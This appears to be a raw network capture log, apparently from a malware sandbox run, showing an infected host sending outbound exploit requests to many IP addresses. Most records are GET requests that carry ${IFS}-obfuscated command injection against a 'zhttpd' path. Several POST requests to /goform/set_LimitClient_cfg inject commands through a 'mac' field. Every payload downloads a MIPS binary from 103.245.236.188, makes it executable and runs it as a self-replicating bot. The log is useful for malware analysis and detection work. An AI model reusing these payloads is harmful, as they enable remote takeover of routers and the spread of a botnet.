                                    Jan 13, 2024 19:02:22.921705008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1765192.168.2.1349394181.57.20.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921746969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1766192.168.2.1352516114.155.237.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921813965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1767192.168.2.1355242180.141.83.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921880007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1768192.168.2.1337498223.170.22.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921916008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1769192.168.2.135793052.235.152.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.921947956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1770192.168.2.1333682164.81.82.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.922004938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1771192.168.2.1337244158.50.188.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.922058105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1772192.168.2.134044612.134.8.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.922107935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1773192.168.2.1339244196.142.246.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.922187090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1774192.168.2.13353989.30.42.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.922238111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1775192.168.2.1358870154.37.54.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.922291994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1776192.168.2.1341570111.34.54.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.922350883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1777192.168.2.133279483.66.160.2418080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.033349991 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1778192.168.2.133359468.55.219.1578080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.392230034 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1779192.168.2.1348932195.174.152.108080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.508306026 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:23.877065897 CET127INHTTP/1.0 302 Redirect
                                    Server: PS HTTP Server
                                    Location: /login.asp
                                    Content-type: text/html
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1780192.168.2.13580961.44.165.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.925947905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1781192.168.2.135857241.170.116.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.925967932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1782192.168.2.1357748178.78.49.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926003933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1783192.168.2.1332898184.7.87.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926050901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1784192.168.2.133307249.38.78.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926070929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1785192.168.2.1344978204.77.89.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926117897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1786192.168.2.1354808137.156.230.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926155090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1787192.168.2.134195840.130.138.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926208973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1788192.168.2.1332786190.111.37.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926233053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1789192.168.2.1347402161.64.110.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926275969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1790192.168.2.1348254154.181.186.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926309109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1791192.168.2.1351740178.51.52.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926348925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1792192.168.2.135095898.59.156.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926367998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1793192.168.2.1340982198.211.100.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926415920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1794192.168.2.135880823.138.29.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926449060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1795192.168.2.1344186131.111.214.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926477909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1796192.168.2.133314625.235.24.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926525116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1797192.168.2.133773667.60.79.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926569939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1798192.168.2.135010661.254.146.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926589966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1799192.168.2.135569860.235.111.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926635981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1800192.168.2.1347916186.103.226.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926673889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1801192.168.2.1338504192.108.178.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926707983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1802192.168.2.1333138178.90.173.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926736116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1803192.168.2.1340062213.227.226.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926764965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1804192.168.2.1355080137.32.139.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926805973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1805192.168.2.1357748161.159.151.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926835060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1806192.168.2.135915432.41.51.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926877022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1807192.168.2.1346918222.40.177.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926923990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1808192.168.2.135008235.106.21.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926934958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1809192.168.2.133616664.149.44.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.926968098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1810192.168.2.1336948110.238.107.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927023888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1811192.168.2.134584851.166.90.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927062988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1812192.168.2.135900261.192.132.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927088976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1813192.168.2.1356708203.52.44.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927129030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1814192.168.2.135603466.21.14.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927175999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1815192.168.2.134082890.46.15.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927208900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1816192.168.2.1355796208.170.11.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927232981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1817192.168.2.135323897.71.72.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927288055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1818192.168.2.1340636121.172.43.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927314997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1819192.168.2.1339020207.254.249.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927341938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1820192.168.2.133464653.29.148.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927391052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1821192.168.2.1340618131.189.184.177443
                                    TimestampBytes transferredDirectionData
